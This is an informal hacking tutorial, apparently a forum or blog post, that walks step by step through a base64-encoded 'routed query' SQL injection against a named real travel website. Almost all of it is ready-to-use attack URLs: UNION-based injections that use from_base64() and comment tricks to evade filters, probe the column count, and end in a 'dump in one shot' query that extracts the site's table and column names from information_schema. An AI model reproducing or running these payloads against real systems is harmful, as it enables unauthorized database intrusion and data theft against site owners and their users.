Base64 Based Routed Query By Kashmiri_Wolf
Tutorial On Base64 Based Routed Query By Kashmiri_Wolf
This is Kashmiri_Wolf .. Today I Am Gonna Write About Base64 Based Routed Query
We Will Use A New Function Here (New For Newbies Like Me)
Which IS "from_base64()"
SO Lets Get Straight :
Here IS Site :
http://www.egytravelcorner.com/ar/articals-more.php?id=1
Its A Basic Injection Till Dios So Here Is Query For Vuln Column :
http://www.egytravelcorner.com/ar/articals-more.php?id=1%27/**shit**//*!00000Union*/(Select(1),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))--%20-&mi_id=384
Here Routed Query Is A Way To Dios It (For Pure Union base and $_get method)
Hex I Allowed Here .. But We Will Use Base64 Routed Query Here ... Lets Start ...
http://www.egytravelcorner.com/ar/articals-more.php?id=1%27/**shit**//*!00000Union*/(Select(from_base64('KDEnKQ==')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))--%20-&mi_id=384
Here is The Error For Routed Query Lets Fix Query And Get Total Numbers Of Columns (Column Count)
http://www.egytravelcorner.com/ar/articals-more.php?id=1%27/**shit**//*!00000Union*/(Select(from_base64('KDEnLS0gLSk=')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))--%20-&mi_id=384
Query Balanced Lets Check For Order by
http://www.egytravelcorner.com/ar/articals-more.php?id=1'/**shit**//*!00000Union*/(Select(from_base64('KDEnIG9yZGVyIGJ5IDktLSAtKQ==')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))-- -&mi_id=384
No Error
http://www.egytravelcorner.com/ar/articals-more.php?id=1'/**shit**//*!00000Union*/(Select(from_base64('KDEnIG9yZGVyIGJ5IDEwLS0gLSk=')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))-- -&mi_id=384
9 columns lets check for vuln Column
http://www.egytravelcorner.com/ar/articals-more.php?id=1%27/**shit**//*!00000Union*/(Select(from_base64('KC4xJyAgVW5pb24gU2VsZWN0IDEsMiwzLDQsNSw2LDcsOCw5OS0tIC0p')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))--%20-&mi_id=384
Vuln Column Is Under Image
Lets Dios :
http://www.egytravelcorner.com/ar/articals-more.php?id=1'/**shit**//*!00000Union*/(Select(FROM_BASE64('KDEnLyoqXyoqLy8qITUwMDAwVW5pb24qL1NlbGVjdCAxMTEsMjIyLDMzMzMsY29uY2F0LyoqXyoqLygweDIyMmYzZTNjNjI3MjNlM2MyZjY0Njk3NjNlM2MyZjc0NjE2MjZjNjUzZTNjMmY3MDNlM2M2NjZmNmU3NDIwNjM2ZjZjNmY3MjNkNzI2NTY0MjA2NjYxNjM2NTNkNjM2MTZkNjI3MjY5NjEyMDczNjk3YTY1M2QzMzNlLG1ha2Vfc2V0KDYsQDo9MHgwYSwoc2VsZWN0KDEpZnJvbShpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyl3aGVyZUA6PW1ha2Vfc2V0KDUxMSxALDB4M2M2YzY5M2UsdGFibGVfbmFtZSxjb2x1bW5fbmFtZSkpLEApKSw1NjYsNjY2LDc3Nyw4ODgsOTk5LS0gLSk=')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))-- -&mi_id=384
SO Here IS Our Final Query !
Keeping Concept In Mind You Can Also Do Same With Char I guess (Not Tested Yet !!)
Credits To ~~> Master Benzi,Khexan Ro0t,Master Janus,Makman,Ajkaro,Rahul Maini,Raz
Sorry For Bad Explanation ........ If Any Problem You Can Pm Me Here Kashmiri_Wolf
Thanks To Sqli-Basic For Letting Me Share This :)
Regards :
Kashmiri_Wolf
No comments